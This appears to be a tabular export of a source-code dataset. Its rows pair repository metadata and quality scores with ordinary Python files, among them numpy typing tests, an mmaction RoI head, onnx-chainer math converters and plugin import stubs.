| 0.165236
| 0.047389
| 0.017552
| 0.022817
| 0.893374
| 0.893374
| 0.893374
| 0.893374
| 0.893374
| 0.893374
| 0
| 0.036948
| 0.36332
| 4,591
| 87
| 286
| 52.770115
| 0.74273
| 0.251797
| 0
| 0.725806
| 0
| 0.048387
| 0.245311
| 0.12837
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.048387
| 0
| 0.048387
| 0.048387
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
426cda52940b716e13d0202c76e1aa5f0c599e1b
| 275
|
py
|
Python
|
pqe/cdf_ops/__init__.py
|
SsnL/poisson_quasimetric_embedding
|
ea8f1b66ce648dcd6cb53208674d0ee4c352dbaf
|
[
"BSD-3-Clause"
] | 9
|
2022-03-15T04:23:25.000Z
|
2022-03-29T09:53:18.000Z
|
pqe/cdf_ops/__init__.py
|
SsnL/poisson_quasimetric_embedding
|
ea8f1b66ce648dcd6cb53208674d0ee4c352dbaf
|
[
"BSD-3-Clause"
] | 1
|
2022-03-24T02:20:41.000Z
|
2022-03-24T02:22:27.000Z
|
pqe/cdf_ops/__init__.py
|
SsnL/poisson_quasimetric_embedding
|
ea8f1b66ce648dcd6cb53208674d0ee4c352dbaf
|
[
"BSD-3-Clause"
] | null | null | null |
from .op_wrappers import (
chndtr, i0, i0e, i1, i1e, prob_two_poisson_gt, prob_two_poisson_le, \
ndtr, log_ndtr, prod_ndtr
)
__all__ = [
'chndtr', 'i0', 'i0e', 'i1', 'i1e',
'prob_two_poisson_gt', 'prob_two_poisson_le',
'ndtr', 'log_ndtr', 'prod_ndtr',
]
| 25
| 73
| 0.647273
| 41
| 275
| 3.829268
| 0.439024
| 0.178344
| 0.356688
| 0.165605
| 0.853503
| 0.853503
| 0.853503
| 0.853503
| 0.853503
| 0.853503
| 0
| 0.035714
| 0.185455
| 275
| 10
| 74
| 27.5
| 0.665179
| 0
| 0
| 0
| 0
| 0
| 0.272727
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4277f9b57bb26b23afbc6e7f0f3f795303902efc
| 192
|
py
|
Python
|
plugins/rapid7_insight_agent/icon_rapid7_insight_agent/actions/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 46
|
2019-06-05T20:47:58.000Z
|
2022-03-29T10:18:01.000Z
|
plugins/rapid7_insight_agent/icon_rapid7_insight_agent/actions/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 386
|
2019-06-07T20:20:39.000Z
|
2022-03-30T17:35:01.000Z
|
plugins/rapid7_insight_agent/icon_rapid7_insight_agent/actions/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 43
|
2019-07-09T14:13:58.000Z
|
2022-03-28T12:04:46.000Z
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
from .check_agent_status.action import CheckAgentStatus
from .get_agent_details.action import GetAgentDetails
from .quarantine.action import Quarantine
| 38.4
| 55
| 0.848958
| 26
| 192
| 6.115385
| 0.692308
| 0.226415
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109375
| 192
| 4
| 56
| 48
| 0.929825
| 0.192708
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4292041f8302b116a7d3fe3558b887531451209d
| 8,888
|
py
|
Python
|
venv/Lib/site-packages/numpy/typing/tests/data/reveal/mod.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 41
|
2021-06-19T13:57:18.000Z
|
2021-12-02T17:08:53.000Z
|
venv/Lib/site-packages/numpy/typing/tests/data/reveal/mod.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 14
|
2021-03-26T20:54:22.000Z
|
2021-04-06T17:18:53.000Z
|
venv/Lib/site-packages/numpy/typing/tests/data/reveal/mod.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 8
|
2021-06-19T14:25:50.000Z
|
2022-03-25T02:00:29.000Z
|
import numpy as np
f8 = np.float64()
i8 = np.int64()
u8 = np.uint64()
f4 = np.float32()
i4 = np.int32()
u4 = np.uint32()
td = np.timedelta64(0, "D")
b_ = np.bool_()
b = bool()
f = float()
i = int()
AR = np.array([1], dtype=np.bool_)
AR.setflags(write=False)
AR2 = np.array([1], dtype=np.timedelta64)
AR2.setflags(write=False)
# Time structures
reveal_type(td % td) # E: numpy.timedelta64
reveal_type(AR2 % td) # E: Any
reveal_type(td % AR2) # E: Any
reveal_type(divmod(td, td)) # E: Tuple[numpy.signedinteger[numpy.typing._64Bit], numpy.timedelta64]
reveal_type(divmod(AR2, td)) # E: Tuple[Any, Any]
reveal_type(divmod(td, AR2)) # E: Tuple[Any, Any]
# Bool
reveal_type(b_ % b) # E: numpy.signedinteger[numpy.typing._8Bit]
reveal_type(b_ % i) # E: numpy.signedinteger[Any]
reveal_type(b_ % f) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ % b_) # E: numpy.signedinteger[numpy.typing._8Bit]
reveal_type(b_ % i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(b_ % u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(b_ % f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ % AR) # E: Any
reveal_type(divmod(b_, b)) # E: Tuple[numpy.signedinteger[numpy.typing._8Bit], numpy.signedinteger[numpy.typing._8Bit]]
reveal_type(divmod(b_, i)) # E: Tuple[numpy.signedinteger[Any], numpy.signedinteger[Any]]
reveal_type(divmod(b_, f)) # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(b_, b_)) # E: Tuple[numpy.signedinteger[numpy.typing._8Bit], numpy.signedinteger[numpy.typing._8Bit]]
reveal_type(divmod(b_, i8)) # E: Tuple[numpy.signedinteger[numpy.typing._64Bit], numpy.signedinteger[numpy.typing._64Bit]]
reveal_type(divmod(b_, u8)) # E: Tuple[numpy.unsignedinteger[numpy.typing._64Bit], numpy.unsignedinteger[numpy.typing._64Bit]]
reveal_type(divmod(b_, f8)) # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(b_, AR)) # E: Tuple[Any, Any]
reveal_type(b % b_) # E: numpy.signedinteger[numpy.typing._8Bit]
reveal_type(i % b_) # E: numpy.signedinteger[Any]
reveal_type(f % b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ % b_) # E: numpy.signedinteger[numpy.typing._8Bit]
reveal_type(i8 % b_) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(u8 % b_) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(f8 % b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(AR % b_) # E: Any
reveal_type(divmod(b, b_)) # E: Tuple[numpy.signedinteger[numpy.typing._8Bit], numpy.signedinteger[numpy.typing._8Bit]]
reveal_type(divmod(i, b_)) # E: Tuple[numpy.signedinteger[Any], numpy.signedinteger[Any]]
reveal_type(divmod(f, b_)) # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(b_, b_)) # E: Tuple[numpy.signedinteger[numpy.typing._8Bit], numpy.signedinteger[numpy.typing._8Bit]]
reveal_type(divmod(i8, b_)) # E: Tuple[numpy.signedinteger[numpy.typing._64Bit], numpy.signedinteger[numpy.typing._64Bit]]
reveal_type(divmod(u8, b_)) # E: Tuple[numpy.unsignedinteger[numpy.typing._64Bit], numpy.unsignedinteger[numpy.typing._64Bit]]
reveal_type(divmod(f8, b_)) # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(AR, b_)) # E: Tuple[Any, Any]
# int
reveal_type(i8 % b) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 % i) # E: numpy.signedinteger[Any]
reveal_type(i8 % f) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i8 % i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 % f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i4 % i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i4 % f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i4 % i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i4 % f4) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(i8 % AR) # E: Any
reveal_type(divmod(i8, b)) # E: Tuple[numpy.signedinteger[numpy.typing._64Bit], numpy.signedinteger[numpy.typing._64Bit]]
reveal_type(divmod(i8, i)) # E: Tuple[numpy.signedinteger[Any], numpy.signedinteger[Any]]
reveal_type(divmod(i8, f)) # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(i8, i8)) # E: Tuple[numpy.signedinteger[numpy.typing._64Bit], numpy.signedinteger[numpy.typing._64Bit]]
reveal_type(divmod(i8, f8)) # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(i8, i4)) # E: Tuple[numpy.signedinteger[numpy.typing._64Bit], numpy.signedinteger[numpy.typing._64Bit]]
reveal_type(divmod(i8, f4)) # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(i4, i4)) # E: Tuple[numpy.signedinteger[numpy.typing._32Bit], numpy.signedinteger[numpy.typing._32Bit]]
reveal_type(divmod(i4, f4)) # E: Tuple[numpy.floating[numpy.typing._32Bit], numpy.floating[numpy.typing._32Bit]]
reveal_type(divmod(i8, AR)) # E: Tuple[Any, Any]
reveal_type(b % i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i % i8) # E: numpy.signedinteger[Any]
reveal_type(f % i8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i8 % i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(f8 % i8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i8 % i4) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(f8 % i4) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i4 % i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(f4 % i4) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(AR % i8) # E: Any
reveal_type(divmod(b, i8)) # E: Tuple[numpy.signedinteger[numpy.typing._64Bit], numpy.signedinteger[numpy.typing._64Bit]]
reveal_type(divmod(i, i8)) # E: Tuple[numpy.signedinteger[Any], numpy.signedinteger[Any]]
reveal_type(divmod(f, i8)) # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(i8, i8)) # E: Tuple[numpy.signedinteger[numpy.typing._64Bit], numpy.signedinteger[numpy.typing._64Bit]]
reveal_type(divmod(f8, i8)) # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(i4, i8)) # E: Tuple[numpy.signedinteger[numpy.typing._64Bit], numpy.signedinteger[numpy.typing._64Bit]]
reveal_type(divmod(f4, i8)) # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(i4, i4)) # E: Tuple[numpy.signedinteger[numpy.typing._32Bit], numpy.signedinteger[numpy.typing._32Bit]]
reveal_type(divmod(f4, i4)) # E: Tuple[numpy.floating[numpy.typing._32Bit], numpy.floating[numpy.typing._32Bit]]
reveal_type(divmod(AR, i8)) # E: Tuple[Any, Any]
# float
reveal_type(f8 % b) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 % i) # E: numpy.floating[Any]
reveal_type(f8 % f) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i8 % f4) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f4 % f4) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(f8 % AR) # E: Any
reveal_type(divmod(f8, b)) # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(f8, i)) # E: Tuple[numpy.floating[Any], numpy.floating[Any]]
reveal_type(divmod(f8, f)) # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(f8, f8)) # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(f8, f4)) # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(f4, f4)) # E: Tuple[numpy.floating[numpy.typing._32Bit], numpy.floating[numpy.typing._32Bit]]
reveal_type(divmod(f8, AR)) # E: Tuple[Any, Any]
reveal_type(b % f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i % f8) # E: numpy.floating[Any]
reveal_type(f % f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 % f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 % f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f4 % f4) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(AR % f8) # E: Any
reveal_type(divmod(b, f8)) # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(i, f8)) # E: Tuple[numpy.floating[Any], numpy.floating[Any]]
reveal_type(divmod(f, f8)) # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(f8, f8)) # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(f4, f8)) # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(f4, f4)) # E: Tuple[numpy.floating[numpy.typing._32Bit], numpy.floating[numpy.typing._32Bit]]
reveal_type(divmod(AR, f8)) # E: Tuple[Any, Any]
| 59.253333
| 127
| 0.740549
| 1,346
| 8,888
| 4.698366
| 0.036404
| 0.198292
| 0.212524
| 0.246679
| 0.935484
| 0.924257
| 0.906705
| 0.884409
| 0.85895
| 0.828748
| 0
| 0.045218
| 0.091809
| 8,888
| 149
| 128
| 59.651007
| 0.738231
| 0.637939
| 0
| 0.165289
| 0
| 0
| 0.000322
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008264
| 0
| 0.008264
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
670c7ad02d36c2d2928ff79b798f4ab44c86495d
| 7,518
|
py
|
Python
|
mmaction/models/heads/roi_head.py
|
why-know/YF-OpenLib-mmaction2
|
355dc5c715796945ec75de2123be2f1a5ae694c7
|
[
"Apache-2.0"
] | 9
|
2021-05-20T16:34:00.000Z
|
2022-02-10T04:22:38.000Z
|
mmaction/models/heads/roi_head.py
|
why-know/YF-OpenLib-mmaction2
|
355dc5c715796945ec75de2123be2f1a5ae694c7
|
[
"Apache-2.0"
] | 1
|
2022-01-09T09:55:06.000Z
|
2022-01-09T09:55:06.000Z
|
mmaction/models/heads/roi_head.py
|
why-know/YF-OpenLib-mmaction2
|
355dc5c715796945ec75de2123be2f1a5ae694c7
|
[
"Apache-2.0"
] | 1
|
2022-01-11T08:29:01.000Z
|
2022-01-11T08:29:01.000Z
|
import numpy as np
import torch
from mmaction.core.bbox import bbox2result
from mmaction.utils import import_module_error_class
try:
from mmdet.core.bbox import bbox2roi
from mmdet.models import HEADS as MMDET_HEADS
from mmdet.models.roi_heads import StandardRoIHead
mmdet_imported = True
except (ImportError, ModuleNotFoundError):
mmdet_imported = False
if mmdet_imported:
@MMDET_HEADS.register_module()
class AVARoIHead(StandardRoIHead):
def _bbox_forward(self, x, rois):
rois = rois.float()
bbox_feat = self.bbox_roi_extractor(x, rois)
if self.with_shared_head:
bbox_feat = self.shared_head(bbox_feat)
cls_score, bbox_pred = self.bbox_head(bbox_feat)
bbox_results = dict(
cls_score=cls_score, bbox_pred=bbox_pred, bbox_feats=bbox_feat)
return bbox_results
def simple_test(self,
x,
proposal_list,
img_metas,
proposals=None,
rescale=False):
assert self.with_bbox, 'Bbox head must be implemented.'
if isinstance(x, tuple):
x_shape = x[0].shape
else:
x_shape = x.shape
assert x_shape[0] == 1, 'only accept 1 sample at test mode'
assert x_shape[0] == len(img_metas) == len(proposal_list)
det_bboxes, det_labels = self.simple_test_bboxes(
x, img_metas, proposal_list, self.test_cfg, rescale=rescale)
bbox_results = bbox2result(
det_bboxes,
det_labels,
self.bbox_head.num_classes,
thr=self.test_cfg.action_thr)
return [bbox_results]
def simple_test_bboxes(self,
x,
img_metas,
proposals,
rcnn_test_cfg,
rescale=False):
"""Test only det bboxes without augmentation."""
rois = bbox2roi(proposals)
bbox_results = self._bbox_forward(x, rois)
cls_score = bbox_results['cls_score']
img_shape = img_metas[0]['img_shape']
crop_quadruple = np.array([0, 0, 1, 1])
flip = False
if 'crop_quadruple' in img_metas[0]:
crop_quadruple = img_metas[0]['crop_quadruple']
if 'flip' in img_metas[0]:
flip = img_metas[0]['flip']
det_bboxes, det_labels = self.bbox_head.get_det_bboxes(
rois,
cls_score,
img_shape,
flip=flip,
crop_quadruple=crop_quadruple,
cfg=rcnn_test_cfg)
return det_bboxes, det_labels
else:
# Just define an empty class, so that __init__ can import it.
@import_module_error_class('mmdet')
class AVARoIHead:
pass
import numpy as np
import torch
from mmaction.core.bbox import bbox2result
from mmaction.utils import import_module_error_class
try:
from mmdet.core.bbox import bbox2roi
from mmdet.models import HEADS as MMDET_HEADS
from mmdet.models.roi_heads import StandardRoIHead
mmdet_imported = True
except (ImportError, ModuleNotFoundError):
mmdet_imported = False
if mmdet_imported:
@MMDET_HEADS.register_module()
class Via3RoIHead(StandardRoIHead):
def _bbox_forward(self, x, rois):
rois = rois.float()
bbox_feat = self.bbox_roi_extractor(x, rois)
if self.with_shared_head:
bbox_feat = self.shared_head(bbox_feat)
cls_score, bbox_pred = self.bbox_head(bbox_feat)
bbox_results = dict(
cls_score=cls_score, bbox_pred=bbox_pred, bbox_feats=bbox_feat)
return bbox_results
def bbox2result(self, bboxes, labels, num_classes, thr=0.01):
"""Convert detection results to a list of numpy arrays.
Args:
bboxes (Tensor): shape (n, 4)
labels (Tensor): shape (n, #num_classes)
num_classes (int): class number, including background class
thr (float): The score threshold used when converting predictions to
detection results
Returns:
list(ndarray): bbox results of each class
"""
if bboxes.shape[0] == 0:
return list(np.zeros((num_classes - 1, 0, 5), dtype=np.float32))
else:
bboxes = bboxes.cpu().numpy()
labels = labels.cpu().numpy()
# We only handle multilabel now
assert labels.shape[-1] > 1
scores = labels # rename for clarification
thr = (thr,) * num_classes if isinstance(thr, float) else thr
assert scores.shape[1] == num_classes
assert len(thr) == num_classes
result = []
for i in range(num_classes):
where = scores[:, i] > thr[i]
result.append(
np.concatenate((bboxes[where, :4], scores[where, i:i +1]),
axis=1))
return result
def simple_test(self,
x,
proposal_list,
img_metas,
proposals=None,
rescale=False):
assert self.with_bbox, 'Bbox head must be implemented.'
if isinstance(x, tuple):
x_shape = x[0].shape
else:
x_shape = x.shape
assert x_shape[0] == 1, 'only accept 1 sample at test mode'
assert x_shape[0] == len(img_metas) == len(proposal_list)
det_bboxes, det_labels = self.simple_test_bboxes(
x, img_metas, proposal_list, self.test_cfg, rescale=rescale)
bbox_results = self.bbox2result(
det_bboxes,
det_labels,
self.bbox_head.num_classes,
thr=self.test_cfg.action_thr)
return [bbox_results]
def simple_test_bboxes(self,
x,
img_metas,
proposals,
rcnn_test_cfg,
rescale=False):
"""Test only det bboxes without augmentation."""
rois = bbox2roi(proposals)
bbox_results = self._bbox_forward(x, rois)
cls_score = bbox_results['cls_score']
img_shape = img_metas[0]['img_shape']
crop_quadruple = np.array([0, 0, 1, 1])
flip = False
if 'crop_quadruple' in img_metas[0]:
crop_quadruple = img_metas[0]['crop_quadruple']
if 'flip' in img_metas[0]:
flip = img_metas[0]['flip']
det_bboxes, det_labels = self.bbox_head.get_det_bboxes(
rois,
cls_score,
img_shape,
flip=flip,
crop_quadruple=crop_quadruple,
cfg=rcnn_test_cfg)
return det_bboxes, det_labels
else:
# Just define an empty class, so that __init__ can import it.
@import_module_error_class('mmdet')
class Via3RoIHead:
pass
| 35.462264
| 84
| 0.539106
| 834
| 7,518
| 4.61271
| 0.173861
| 0.037432
| 0.023395
| 0.037432
| 0.808682
| 0.808682
| 0.808682
| 0.808682
| 0.808682
| 0.808682
| 0
| 0.012111
| 0.384943
| 7,518
| 211
| 85
| 35.630332
| 0.819853
| 0.082203
| 0
| 0.858025
| 0
| 0
| 0.036031
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 1
| 0.04321
| false
| 0.012346
| 0.148148
| 0
| 0.265432
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
671c4f479d7f97afec654ab4fa4bf48e53c5da56
| 2,822
|
py
|
Python
|
onnx_chainer/functions/math/basic_math.py
|
Hakuyume/onnx-chainer
|
3c46bd692ef38a7c0f45a2a09795d2023364e12b
|
[
"MIT"
] | null | null | null |
onnx_chainer/functions/math/basic_math.py
|
Hakuyume/onnx-chainer
|
3c46bd692ef38a7c0f45a2a09795d2023364e12b
|
[
"MIT"
] | null | null | null |
onnx_chainer/functions/math/basic_math.py
|
Hakuyume/onnx-chainer
|
3c46bd692ef38a7c0f45a2a09795d2023364e12b
|
[
"MIT"
] | null | null | null |
import numpy as np
from onnx import helper
from onnx import numpy_helper
from onnx_chainer import mapping
import os
def convert_unary_operator(
func, input_names, param_names, parameters, input_tensors):
for i, input_name in enumerate(input_names):
if type(input_name) is not str:
input_names[i] = str(input_name)
layer_name = mapping.operators[func.__class__.__name__]
out_names = [str(id(out())) for out in func.outputs]
return helper.make_node(layer_name, input_names, out_names),
def convert_binary_operator(
func, input_names, param_names, parameters, input_tensors):
for i, input_name in enumerate(input_names):
if type(input_name) is not str:
input_names[i] = str(input_name)
layer_name = mapping.operators[func.__class__.__name__]
out_names = [str(id(out())) for out in func.outputs]
return helper.make_node(layer_name, input_names, out_names),
def convert_Add(func, input_names, param_names, parameters, input_tensors):
return convert_binary_operator(
func, input_names, param_names, parameters, input_tensors)
def convert_Sub(func, input_names, param_names, parameters, input_tensors):
return convert_binary_operator(
func, input_names, param_names, parameters, input_tensors)
def convert_Mul(func, input_names, param_names, parameters, input_tensors):
return convert_binary_operator(
func, input_names, param_names, parameters, input_tensors)
def convert_Neg(func, input_names, param_names, parameters, input_tensors):
return convert_binary_operator(
func, input_names, param_names, parameters, input_tensors)
def convert_Div(func, input_names, param_names, parameters, input_tensors):
return convert_binary_operator(
func, input_names, param_names, parameters, input_tensors)
def convert_Absolute(
func, input_names, param_names, parameters, input_tensors):
return convert_unary_operator(
func, input_names, param_names, parameters, input_tensors)
def convert_PowVarConst(
func, input_names, param_names, parameters, input_tensors):
layer_name = 'Pow_{}'.format(str(id(func.value)))
value = np.asarray([func.value], dtype=func.inputs[0].get_variable().dtype)
param_names[id(func.value)] = os.path.join(layer_name, 'value')
parameters.append(
numpy_helper.from_array(
value,
param_names[id(func.value)]
)
)
input_tensors.append(
helper.make_tensor_value_info(
param_names[id(func.value)],
mapping.dtypes[value.dtype],
value.shape
)
)
input_names.append(param_names[id(func.value)])
return convert_binary_operator(
func, input_names, param_names, parameters, input_tensors)
| 32.068182
| 79
| 0.718285
| 371
| 2,822
| 5.118598
| 0.172507
| 0.121116
| 0.117957
| 0.160084
| 0.801474
| 0.757241
| 0.757241
| 0.757241
| 0.733017
| 0.733017
| 0
| 0.000439
| 0.192062
| 2,822
| 87
| 80
| 32.436782
| 0.832456
| 0
| 0
| 0.47541
| 0
| 0
| 0.003898
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.147541
| false
| 0
| 0.081967
| 0.098361
| 0.377049
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
679b067c6e149259e77b4979e94286af5fd19288
| 187
|
py
|
Python
|
services/plc_connector/json_converter/py/messages/__init__.py
|
koorya/machine_scripting
|
01e5474a8131e7c81266b9bc21f7400a45c808fc
|
[
"MIT"
] | null | null | null |
services/plc_connector/json_converter/py/messages/__init__.py
|
koorya/machine_scripting
|
01e5474a8131e7c81266b9bc21f7400a45c808fc
|
[
"MIT"
] | 27
|
2021-12-14T07:10:23.000Z
|
2022-02-28T10:04:26.000Z
|
services/plc_connector/json_converter/py/messages/__init__.py
|
koorya/machine_scripting
|
01e5474a8131e7c81266b9bc21f7400a45c808fc
|
[
"MIT"
] | null | null | null |
from ..messages.cnn_task import CNNTask
from ..messages.cnn_answer import CNNAnswer
from ..messages.service_task import ServiceTask
from ..messages.service_response import ServiceResponse
| 46.75
| 55
| 0.855615
| 24
| 187
| 6.5
| 0.5
| 0.307692
| 0.192308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.080214
| 187
| 4
| 55
| 46.75
| 0.906977
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
67a8d8154cab0921e50e8c8ef217dc3f3e9a5d14
| 70
|
py
|
Python
|
src/test.py
|
Shreejan-35/VAULTERPY
|
91823a880b406b8958eb4bb91ee311671c39eae2
|
[
"MIT"
] | 2
|
2022-03-27T21:56:18.000Z
|
2022-03-30T09:06:29.000Z
|
src/test.py
|
Shreejan-35/PYVAULT
|
91823a880b406b8958eb4bb91ee311671c39eae2
|
[
"MIT"
] | null | null | null |
src/test.py
|
Shreejan-35/PYVAULT
|
91823a880b406b8958eb4bb91ee311671c39eae2
|
[
"MIT"
] | null | null | null |
from vaulter_py import *
from vaulter_py.passvault import main
main()
| 17.5
| 37
| 0.814286
| 11
| 70
| 5
| 0.545455
| 0.4
| 0.472727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128571
| 70
| 4
| 38
| 17.5
| 0.901639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
67e17881015281b2b0e5610621f45ebfa08a5360
| 3,758
|
py
|
Python
|
tests/test_zone.py
|
oliverpell/pymultiMATIC
|
f4029bdd7d043b9d9f6411da13596535c89c077b
|
[
"MIT"
] | 30
|
2019-12-01T16:04:11.000Z
|
2022-02-28T09:23:52.000Z
|
tests/test_zone.py
|
oliverpell/pymultiMATIC
|
f4029bdd7d043b9d9f6411da13596535c89c077b
|
[
"MIT"
] | 43
|
2019-11-09T18:55:10.000Z
|
2022-02-25T20:05:55.000Z
|
tests/test_zone.py
|
oliverpell/pymultiMATIC
|
